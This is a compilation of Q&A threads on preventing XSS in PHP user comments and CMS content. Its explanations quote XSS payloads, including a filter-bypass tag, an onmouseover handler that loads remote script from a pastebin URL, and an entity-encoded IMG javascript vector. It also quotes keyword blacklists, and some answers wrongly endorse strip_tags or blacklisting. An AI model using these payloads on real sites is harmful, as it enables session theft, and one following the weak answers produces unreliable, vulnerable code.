New Way To Prevent XSS Attacks - php

I have a website related to entertainment. So, I have thought to use a new method to prevent XSS Attack. I have created the following words list
alert(, javascript, <script>,<script,vbscript,<layer>,
<layer,scriptalert,HTTP-EQUIV,mocha:,<object>,<object,
AllowScriptAccess,text/javascript,<link>, <link,<?php, <?import,
I have thought that because my site is related to entertainment, So I do not expect from a normal user (other than malicious user) to use such kind of words in his comment. So, I have decided to remove all the above comma separated words from the user submitted string. I need your advice. Do I no need to use htmlpurifier like tools after doing this?
Note: I am not using htmlspecialchars() because it will also convert the tags generated from my Rich Text Editor (CKEditor), so user formatted will be gone.

Using a black list is a bad idea as it is simple to circumvent. For example, you are checking for and presumably removing <script>. To circumvent this, a malicious user can enter:
<scri<script>pt>
your code will strip out the middle <script> leaving the outer <script> intact and saved to the page.
If you need to enter HTML and your users do not, then prevent them from entering HTML. You need to have a separate method, only accessible to you, for entering articles that with HTML.

This approach misunderstands what the HTML-injection problem is, and is utterly ineffective.
There are many, many more ways to put scripting in HTML than the above list, and many ways to evade the filter by using escaped forms. You will never catch all potential "harmful" constructs with this kind of naive sequence blacklisting, and if you try you will inconvenience users with genuine comments. (eg banning use of words beginning with on...)
The correct way to prevent HTML-injection XSS is:
use htmlspecialchars() when outputting content that is supposed to be normal text (which is the vast majority of content);
if you need to allow user-supplied HTML markup, whitelist the harmless tags and attributes you wish to allow, and enforce that using HTMLPurifier or another similar library.
This is a standard and well-understood part of writing a web application, and is not difficult to implement.

Why not just make a function that reverts the changes htmlspecialchars() made for the specific tags you want to be available, such as <b><i><a> etc?

Hacks to circumvent your list aside, it's always better to use a whitelist than a blacklist.
In this case, you would already have a clear list of tags that you want to support, so just whitelist tags like <em>, <b>, etc, using some HTML purifier.

you can try with
htmlentities()
echo htmlentities("<b>test word</b>");
ouput: <b>test word</b>gt;
strip_tags()
echo strip_tags("<b>test word</b>");
ouput: test word
mysql_real_escape_string()
or try a simple function
function clean_string($str) {
if (!get_magic_quotes_gpc()) {
$str = addslashes($str);
}
$str = strip_tags(htmlspecialchars($str));
return $str;
}

Related

PHP "strip_tags" accept all except script

I am creating a Page-Preview before publishing or saving that page. What I have currently encountered that I have forgotten to add <h1> <h2> <h3> etc tags to the allowable list, but I have added them later.
I want to allow ALL HTML tags except the <script> tag, and so far I came up with this list:
public static function tags() {
return '<p><a><hr><br><table><thead><tbody><tr><td><th><tfoot><span><div><ul><ol><li><img>' .
'<canvas><video><object><embed><audio><frame><iframe><label><option><select><option>' .
'<input><textarea><button><form><param><pre><code><small><em><b><u><i><strong><article>' .
'<aside><bdi><details><summary><figure><figcaption><footer><header><hgroup><mark><meter>' .
'<nav><progress><ruby><rt><rp><section><time><wbr><track><source><datalist><output><keygen>' .
'<h1><h2><h3><h4><h5><h6><h7><h8><h9>';
}
So I use this static method like this:
$model->content = strip_tags($_POST['contents'], HTML5Custom::tags());
Have I missed any of the tags there?
I was mostly focusing on AVAILABLE tags in HTML5 specification, and all HTML4 (and lower) tags which are deprecated in HTML5 are not in the list.
Please don't use strip_tags, it is unsafe, and unreliable - read the following discussion on strip_tags for what you should use:
Strip_tags discussion on reddit.com
:: Details of Reddit post ::
strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:
It can eat legitimate text. It turns "This shows that x<y." into
"This shows that x", and unless it gets a closing '>' it will
continue to eat the rest of the lines in the comment. (It prevents
people from discussing HTML, for example.)
It doesn't prevent typed HTML entities. People can (and do) exploit
that to bypass word filters & spam filters.
Using the second parameter to allow some tags is 100% dangerous. It
starts out innocently: someone wants to permit simple formatting in
user comments and does something like this:
What everyone should know about strip_tags()
strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:
It can eat legitimate text. It turns "This shows that x<y." into "This shows that x", and unless it gets a closing '>' it will continue to eat the rest of the lines in the comment. (It prevents people from discussing HTML, for example.)
It doesn't prevent typed HTML entities. People can (and do) exploit that to bypass word filters & spam filters.
Using the second parameter to allow some tags is 100% dangerous. It starts out innocently: someone wants to permit simple formatting in user comments and does something like this:
$message = strip_tags($message, '');
But attributes on tags aren't removed. So I could come to your site and post a comment like this:
<b style="color:red;font-size:100pt;text-decoration:blink">hello</b>
Suddenly I can use whatever formatting I want. Or I could do this:
<b style="background:url(http://someserver/transparent.gif);font-weight:normal">hello</b>
Using that I can track users browsing your site without them or you knowing.
Or if I was particularly evil, I could do something like this:
<b onmouseover="s=document.createElement('script');s.src='http://pastebin.com/raw.php?i=j1Vhq2aJ';document.getElementsByTagName('head')[0].appendChild(s)">hello</b>
Using that I could inject my own script into your site, triggered by somebody's cursor moving over my comment. Such a script would run in the user's browser with the full privileges of the page, so it is very dangerous. It could steal or delete private user data. It could alter any part of the page, such as to display fake messages or shock images. It could exploit your site's reputation to trick users into downloading malware. A single comment could even spread across the site rapidly, virally by submitting new comments from the user who views it.
You can't overstate the danger of using that second parameter. If someone cared enough, it could be leveraged to wreak total havoc.
The second parameter doesn't work decently even for known safe text. Usage like strip_tags('text in which we want line breaks<br/>but no formatting', '<br>') still strips the break because it sees the '/' as part of the tag name.
If you simply want to prevent HTML and formatting in user-submitted input, to display text on a web page exactly as typed, the correct function is htmlspecialchars. Follow that with nl2br if you want to display multiple lines, otherwise the text will appear on one line. (++Edit: You should know what character set you're using (and if you don't, aim to use UTF-8 everywhere as it's becoming a web standard). If you're using a weird not-ASCII-compatible character set, you must specify that as the second parameter to htmlspecialchars for it to work properly.)
For when you want to allow formatting, there are proper pre-designed libraries out there for allowing safe use of various syntaxes, including HTML, Markdown, BBCode, and Wikitext.
For when you want to permit formatting, you should use a proper library designed for doing this. Markdown (as used on Reddit) is a user-friendly formatting syntax, but as flyingfirefox has explained below, it allows HTML and is not safe on its own. (It is a formatter and not a sanitizer). Use of HTML and/or Markdown for formatting can be made fully safe with a sanitizer like HTML Purifier, which does what strip_tags was supposed to do. BBCode is another option.
If you feel the need to make your own formatter, even a simple one, look at existing implementations to see what they do because there are a surprising number of subtleties involved in making them reliable and safe.
The only appropriate time to use strip_tags would be to remove HTML that was supposed to be there, and now you're converting to a non-HTML format. For example, if you have some content formatted as HTML and now you want to write it to a plain text file, then using strip_tags, followed by htmlspecialchars_decode or html_entity_decode will do that. (In this case, strip_tags won't have the flaw of removing legitimate text because the text should have already been properly escaped as entities when it was made into HTML in the first place.)
Generally, strip_tags is just the wrong function. Never use it. And if you do, absolutely never use the second parameter, because sooner or later someone will abuse it.
In this case it's going to be easier to blacklist as opposed to whitelist, otherwise you'll have to constantly revisit this script and update it.
Also, strip_tags() is unreliable for making HTML safe, it's still possible to inject javascript in attributes eg onmouseover="alert('hax'); and it will get past strip_tags() just fine.
My go-to library for HTML filtering/sanitation is HTML Purifier.

How dangerous is it to output certain content without escaping it first

Following on from a question I asked about escaping content when building a custom cms I wanted to find out how dangerous not escaping content from the db can be - assume the data ha been filtered/validated prior to insertion in the db.
I know it's a best practice to escape output but I'm just not sure how easy or even possible it is for someone to 'inject' a value into page content that is to be displayed.
For example let's assume this content with HTML markup is displayed using a simple echo statement:
<p>hello</p>
Admittedly it won't win any awards as far as content writing goes ;)
My question is can someone alter that for evil purposes assuming filtered/validated prior to db insertion?
Always escape for the appropriate context; it doesn't matter if it's JSON or XML/HTML or CSV or SQL (although you should be using placeholders for SQL and a library for JSON), etc.
Why? Because it's consistent. And being consistent is also a form of being lazy: you don't need to ponder if the data is "safe for HTML" because it shouldn't matter. And being lazy (in a good way) is a valuable programming trait. (In this case it's also being lazy about avoiding having to fix "bugs" due to changes in the future.)
Don't omit escaping "because it will never contain data that needs to be escaped" .. because, one day, over a course of a number of situations, that assumption will be wrong.
If you do not escape your HTML output, one could simply insert scripts into the HTML code of your page - running in the browser of every client that visits your page. It is called Cross-site scripting (XSS).
For example:
<p>hello</p><script>alert('I could run any other Javascript code here!');</script>
In the place of the alert(), you can use basically anything: access cookies, manipulate the DOM, communicate with other servers, et cetera.
Well, this is a very easy way of inserting scripts, and strip_tags can protect against this one. But there are hundreds of more sophisticated tricks, that strip_tags simply won't protect against.
If you really want to store and output HTML, HTMLPurifier could be your solution:
Hackers have a huge arsenal of XSS vectors hidden within the depths of
the HTML specification. HTML Purifier is effective because it
decomposes the whole document into tokens and removing non-whitelisted
elements, checking the well-formedness and nesting of tags, and
validating all attributes according to their RFCs. HTML Purifier's
comprehensive algorithms are complemented by a breadth of knowledge,
ensuring that richly formatted documents pass through unstripped.
It could be, for example, also problem linked with some other vulnerabilities like e.g. sql injection. Then someone would b e able to ommit filtering/validation prior adding to db and display whatever he can.
If you are pulling the word hello from the database and displaying it nothing will happen. If the content contains the <script> tags though then it is dangerous because a users cookies can be stolen then and used to hijack their session.

how to use textarea tags without opening up security

I know it sounds somehow but have done a bit of search on this even in G and no desired results.
What is the best approach to allow tags in your textarea boxes without opening up security hole in your application.
If you are talking about filtering data to protect yourself from XSS attacks, etc. You might want to take a look at HTML Purifier and please do not consider using regex :)
If you want to allow html tags in your textarea I would recommended strictly restricting allowable tags. For example, you could allow only "em" or "i" tags. Everything else that you don't need should be filtered out.

people are hacking my filter

i am using regex and blocking out the words document|window|alert|onmouseover|onclick to prevent xss, and people seem to be able to bypassing it by just typing doc\ument, how do i fix this ?
thanks!
--
edit: what about preventing xss server side? maybe refuse to serve any file that contains stuff in a GET variable?
Obviously, you would have to supply some meaningful detail to get any serious answer for your problem at hand.
As #David Dorward notes, the most easy option is to escape all HTML entities. That disables all HTML, but you don't have to deal with the plight of fighting XSS attacks.
If you need to suppot HTML, consider using a pre-made Anti-XSS filter like HTML purifier that promises to reliably block such attempts.
HTML Purifier is a standards-compliant HTML filter library written in PHP. HTML Purifier will not only remove all malicious code (better known as XSS) with a thoroughly audited, secure yet permissive whitelist, it will also make sure your documents are standards compliant, something only achievable with a comprehensive knowledge of W3C's specifications.
The simple option is to disallow any HTML and the convert all &, < and > to their respective entities (&, < and >).
The more complicated approach is to run the input through an HTML parser, apply a whitelist to element and attribute names, then serialise it back to HTML.
Is this system at all important/critical?
If so, turn it off immediately and hire a security consultant to secure it for you.
Security is a hard problem. Don't think you can get it right first time, because you won't.
If this is just a system you play around with?
Trying to stop XSS by filtering particular words is a losing battle. If you don't want HTML insertion, just HTML-encode everything. If you do want some HTML, then you need to parse the HTML, make sure it's valid and isn't going to break the page, and only then make sure it doesn't contain any elements or attributes that you don't want.
I had the same problem and only asked the question yesterday. Personally rather than deleteing tags I created a list of all the tags I did want. Using the PHP command strip_tags is what I use now.
strip_tags ( string $str [, string $allowable_tags ] )
Using this command you can simply apply it to your filter like this.
text entered:
<b>Hi</b><malicious tag>
strip_tags("<b>Hi</b><malicious tag>","<b>")
This would output <b>Hi</b>.

How can I allow my user to insert HTML code, without risks? (not only technical risks)

I developed a web application, that permits my users to manage some aspects of a web site dynamically (yes, some kind of cms) in LAMP environment (debian, apache, php, mysql)
Well, for example, they create a news in their private area on my server, then this is published on their website via a cURL request (or by ajax).
The news is created with an WYSIWYG editor (fck at moment, probably tinyMCE in the next future).
So, i can't disallow the html tags, but how can i be safe?
What kind of tags i MUST delete (javascripts?)?
That in meaning to be server-safe.. but how to be 'legally' safe?
If an user use my application to make xss, can i be have some legal troubles?
If you are using php, an excellent solution is to use HTMLPurifier. It has many options to filter out bad stuff, and as a side effect, guarantees well formed html output. I use it to view spam which can be a hostile environment.
It doesn't really matter what you're looking to remove, someone will always find a way to get around it. As a reference take a look at this XSS Cheat Sheet.
As an example, how are you ever going to remove this valid XSS attack:
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
Your best option is only allow a subset of acceptable tags and remove anything else. This practice is know as White Listing and is the best method for preventing XSS (besides disallowing HTML.)
Also use the cheat sheet in your testing; fire as much as you can at your website and try to find some ways to perform XSS.
The general best strategy here is to whitelist specific tags and attributes that you deem safe, and escape/remove everything else. For example, a sensible whitelist might be <p>, <ul>, <ol>, <li>, <strong>, <em>, <pre>, <code>, <blockquote>, <cite>. Alternatively, consider human-friendly markup like Textile or Markdown that can be easily converted into safe HTML.
Rather than allow HTML, you should have some other markup that can be converted to HTML. Trying to strip out rogue HTML from user input is nearly impossible, for example
<scr<script>ipt etc="...">
Removing from this will leave
<script etc="...">
Kohana's security helper is pretty good. From what I remember, it was taken from a different project.
However I tested out
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
From LFSR Consulting's answer, and it escaped it correctly.
For a C# example of white list approach, which stackoverflow uses, you can look at this page.
If it is too difficult removing the tags you could reject the whole html-data until the user enters a valid one.
I would reject html if it contains the following tags:
frameset,frame,iframe,script,object,embed,applet.
Also tags which you want to disallow are: head (and sub-tags),body,html because you want to provide them by yourself and you do not want the user to manipulate your metadata.
But generally speaking, allowing the user to provide his own html code always imposes some security issues.
You might want to consider, rather than allowing HTML at all, implementing some standin for HTML like BBCode or Markdown.
I use this php strip_tags function because i want user can post safely and i allow just few tags which can be used in post in this way nobody can hack your website through script injection so i think strip_tags is best option
Clich here for code for this php function
It is very good function in php you can use it
$string = strip_tags($_POST['comment'], "<b>");

Categories